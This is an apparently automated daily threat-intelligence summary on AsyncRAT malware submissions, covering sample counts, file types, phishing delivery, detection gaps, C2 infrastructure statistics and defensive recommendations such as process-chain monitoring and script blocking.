Daily Summary
AsyncRAT sample submissions surged to 21 today, a 36% increase above the 7-day average of 15. The trend is rising, driven primarily by a heavy concentration of script-based loaders.
New Samples Detected
Script-based payloads dominate, with PowerShell (.ps1) files accounting for 9 of 21 samples and batch (.bat) files contributing 5. Executable files (.exe) and screensaver (.scr) files each accounted for only 2 samples. The single JavaScript (.js) file, paired with an archive (.rar and .zip), suggests a layered delivery chain where scripts are the initial infection vector rather than compiled binaries.
Distribution Methods
Delivery relies on phishing campaigns and social engineering. The prevalence of .ps1 and .bat files indicates attachment-based lures or downloader scripts hosted on file-sharing platforms. The single .js file may be embedded in Office documents or weaponized PDFs. The absence of macro-enabled Office files (e.g., .docm, .xlsm) marks a continued shift away from VBA-based attacks toward simpler scripting languages.
Detection Rate
Static detection for these script-based variants remains moderate. Many signature-based engines flag common PowerShell indicators but miss obfuscated or heavily commented scripts. The .scr and .exe samples likely contain packed or encrypted AsyncRAT payloads that evade runtime heuristics. Current detection gaps favor the use of behavioral analytics over file scanning.
C2 Infrastructure
Today’s analysis identified 100 new C2 servers, with a total of 121 new IOCs (domains, IPs, and URLs). No geographic clustering was observed, indicating use of diverse hosting providers and potentially bulletproof hosting. The high ratio of C2 servers to samples suggests a distributed infrastructure designed to limit exposure.
7-Day Trend
Activity has escalated over the past three days, with today’s 36% spike the highest of the week. The sustained increase above the 7-day average indicates campaign acceleration rather than a one-day anomaly.
Security Analysis
A notable shift is the scarcity of compiled executables (only 2 of 21 samples) in favor of scripts and archives. This mirrors broader adversary trends toward fileless techniques and living-off-the-land approaches. Defenders should monitor process creation chains for powershell.exe spawning cmd.exe or rundll32.exe, and block outbound connections to domains registered within the last 30 days. Deploying a script-blocking policy for non-admin users in Windows Defender or AppLocker is the most actionable defensive recommendation today.